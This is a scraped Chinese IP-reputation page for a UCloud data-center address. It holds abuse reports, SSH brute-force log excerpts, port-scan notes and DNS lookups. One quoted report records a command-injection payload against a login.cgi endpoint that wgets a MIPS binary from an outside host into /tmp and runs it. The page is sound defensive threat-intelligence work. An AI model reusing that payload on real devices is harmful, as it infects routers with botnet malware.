117.50.93.66 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): Shanghai UCloud Information Technology Company Limited

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Data Center/Web Hosting/Transit

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attack	Apr 10 00:12:16 NPSTNNYC01T sshd[22828]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.93.66 Apr 10 00:12:18 NPSTNNYC01T sshd[22828]: Failed password for invalid user martin from 117.50.93.66 port 45218 ssh2 Apr 10 00:16:44 NPSTNNYC01T sshd[23035]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.93.66 ...	2020-04-10 12:24:48

类型

评论内容

时间

attack

Apr 10 00:12:16 NPSTNNYC01T sshd[22828]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.93.66
Apr 10 00:12:18 NPSTNNYC01T sshd[22828]: Failed password for invalid user martin from 117.50.93.66 port 45218 ssh2
Apr 10 00:16:44 NPSTNNYC01T sshd[23035]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.93.66
...

2020-04-10 12:24:48

相同子网IP讨论:

IP	类型	评论内容	时间
117.50.93.75	attack	ET SCAN NMAP -sS window 1024	2020-10-10 03:44:15
117.50.93.75	attackspambots	" "	2020-10-09 19:39:56
117.50.93.75	attackbotsspam	[N10.H2.VM2] Port Scanner Detected Blocked by UFW	2020-10-04 06:49:43
117.50.93.75	attackbots	" "	2020-10-03 22:58:47
117.50.93.75	attackbots	1025/tcp 10333/tcp 1027/tcp... [2020-08-06/10-02]70pkt,20pt.(tcp)	2020-10-03 14:41:52
117.50.93.75	attack	4730/tcp 4567/tcp 465/tcp... [2020-06-18/08-14]58pkt,18pt.(tcp)	2020-08-15 03:20:56
117.50.93.75	attackbots	firewall-block, port(s): 4880/tcp	2020-07-27 17:58:06
117.50.93.75	attackbotsspam	suspicious action Tue, 25 Feb 2020 13:38:39 -0300	2020-02-26 01:38:04
117.50.93.75	attackspam	MultiHost/MultiPort Probe, Scan, Hack -	2020-01-14 21:50:18
117.50.93.75	attackspam	22.12.2019 08:27:07 Connection to port 13 blocked by firewall	2019-12-22 19:25:09
117.50.93.75	attack	Automatic report - Banned IP Access	2019-12-20 08:18:41
117.50.93.63	attack	Aug 10 19:50:27 xtremcommunity sshd\[6555\]: Invalid user louie from 117.50.93.63 port 36334 Aug 10 19:50:27 xtremcommunity sshd\[6555\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.93.63 Aug 10 19:50:29 xtremcommunity sshd\[6555\]: Failed password for invalid user louie from 117.50.93.63 port 36334 ssh2 Aug 10 19:58:58 xtremcommunity sshd\[6842\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.93.63 user=root Aug 10 19:59:00 xtremcommunity sshd\[6842\]: Failed password for root from 117.50.93.63 port 47904 ssh2 ...	2019-08-11 09:41:54
117.50.93.63	attack	SSH Bruteforce attack	2019-08-10 02:13:40

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 117.50.93.66
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 27981
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;117.50.93.66.			IN	A

;; AUTHORITY SECTION:
.			429	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020040903 1800 900 604800 86400

;; Query time: 76 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Apr 10 12:24:44 CST 2020
;; MSG SIZE  rcvd: 116

HOST信息:

Host 66.93.50.117.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 66.93.50.117.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
106.13.84.151	attack	SSH Brute-Force Attack	2020-04-19 01:44:14
113.172.189.254	attackspambots	Invalid user admin from 113.172.189.254 port 56486	2020-04-19 02:08:32
139.59.2.184	attackspambots	20 attempts against mh-ssh on echoip	2020-04-19 01:35:04
49.235.73.150	attackbots	Invalid user pt from 49.235.73.150 port 36226	2020-04-19 01:48:56
41.218.203.61	attack	Invalid user admin from 41.218.203.61 port 57529	2020-04-19 01:50:27
49.235.183.37	attackspambots	Apr 18 13:46:58 Tower sshd[19783]: Connection from 49.235.183.37 port 32998 on 192.168.10.220 port 22 rdomain "" Apr 18 13:46:59 Tower sshd[19783]: Invalid user admin from 49.235.183.37 port 32998 Apr 18 13:46:59 Tower sshd[19783]: error: Could not get shadow information for NOUSER Apr 18 13:46:59 Tower sshd[19783]: Failed password for invalid user admin from 49.235.183.37 port 32998 ssh2 Apr 18 13:46:59 Tower sshd[19783]: Received disconnect from 49.235.183.37 port 32998:11: Bye Bye [preauth] Apr 18 13:46:59 Tower sshd[19783]: Disconnected from invalid user admin 49.235.183.37 port 32998 [preauth]	2020-04-19 01:48:21
195.22.157.62	spam	X-Originating-IP: [193.110.5.34] Received: from 10.197.37.73 (EHLO independentbargains.net) (193.110.5.34) by mta4145.mail.bf1.yahoo.com with SMTP; Thu, 16 Apr 2020 22:32:26 +0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; s=a370db0; d=independentbargains.net; h=Date:To:In-Reply-to:References:From:Subject:Message-ID:Content-Type:Date; i=R5E0Z5eDqXsxqESUs7rkTFzLDvS5pVFa2cpAKNeRoWhdkFesf6wmi7kYfCx2DsTb22hu0WmmaItTV7b9jAAJwfhUDB0cF17UiBPM@independentbargains.net; bh=HWwakQvr+h2/J8UCjTBPPhQkH5kV/jBPAU0DaTSHyZI=; b=ALdwie8H3PMom+GeFPi5vXq2+B6PLAZRKM40SqeFHbyCtrIrDGxrLSn1cuZxhp3j3M0lKLvOAdQJ ZhlyIIQJjk3nEsBYZH3XpNWt1WdKTKsFrQlG0CPzYg6TZKb97wx7OAQ0ZWmCkAvDvOjmSnMNUGFf KtOi35rMo42b0cml3Qk= Received: from localhost (127.0.0.1) by independentbargains.net id hj3efk16lt0r for ; Thu, 16 Apr 2020 15:25:09 -0400 (envelope-from ) X-InboxResponse-ID: 95415081531512866444943776517228081719862-2020.04.16.15.25.09-9629443963879018984550163485466-10124558399625804616783828754825 Date: Thu, 16 Apr 2020 15:25:09 -0400 X-Priority: 3 To: @yahoo.com Subject:Refi Notice: 16 APR 2020. X-dmid: 66QFHN4-J6K0UO-BFS6381H2G Message-ID: X-Originating-IP: 193.110.5.34 Content-Type: multipart/alternative; boundary="---NextPart--=BM27PDH4G8EVGRHK79DSL71IRZPQUV25TLFJ77JMQNY25" Date: Thu, 16 Apr 2020 15:25:09 -0400 Content-Length: 84938	2020-04-19 01:50:01
171.244.51.114	attackbotsspam	$f2bV_matches	2020-04-19 01:30:41
120.132.13.151	attackbots	(sshd) Failed SSH login from 120.132.13.151 (CN/China/chunhui.net.cn): 5 in the last 3600 secs	2020-04-19 02:06:21
179.93.149.17	attack	Apr 18 18:33:52 MainVPS sshd[29326]: Invalid user admin from 179.93.149.17 port 39765 Apr 18 18:33:52 MainVPS sshd[29326]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=179.93.149.17 Apr 18 18:33:52 MainVPS sshd[29326]: Invalid user admin from 179.93.149.17 port 39765 Apr 18 18:33:54 MainVPS sshd[29326]: Failed password for invalid user admin from 179.93.149.17 port 39765 ssh2 Apr 18 18:40:07 MainVPS sshd[2297]: Invalid user admin from 179.93.149.17 port 45409 ...	2020-04-19 01:29:43
80.211.117.207	attack	/login.cgi?cli=aa aa';wget http://157.230.29.251/bins/Solar.mips -O -> /tmp/.Solar;chmod 777 /tmp/.Solar;/tmp/.Solar dlink'$	2020-04-19 02:01:31
122.224.98.46	attackspam	2020-04-18T17:48:58.349593upcloud.m0sh1x2.com sshd[10923]: Invalid user dr from 122.224.98.46 port 11707	2020-04-19 02:05:17
123.21.197.139	attackbotsspam	Invalid user admin from 123.21.197.139 port 39263	2020-04-19 01:38:05
144.217.7.75	attackbots	Apr 18 19:49:00 vserver sshd\[32268\]: Invalid user test from 144.217.7.75Apr 18 19:49:02 vserver sshd\[32268\]: Failed password for invalid user test from 144.217.7.75 port 48162 ssh2Apr 18 19:54:25 vserver sshd\[32377\]: Invalid user rx from 144.217.7.75Apr 18 19:54:27 vserver sshd\[32377\]: Failed password for invalid user rx from 144.217.7.75 port 40336 ssh2 ...	2020-04-19 02:03:26
93.14.78.71	attack	Invalid user git from 93.14.78.71 port 53040	2020-04-19 01:45:46

最近上报的IP列表

112.140.252.31	215.4.43.220	101.135.162.65	102.81.84.144
218.7.221.231	142.101.206.127	104.23.5.54	193.145.169.58
221.169.212.34	67.45.179.33	162.243.128.97	202.175.60.53
162.243.130.125	2.59.119.35	113.116.57.104	15.185.228.9
190.88.217.122	119.28.132.211	111.157.128.19	182.53.230.105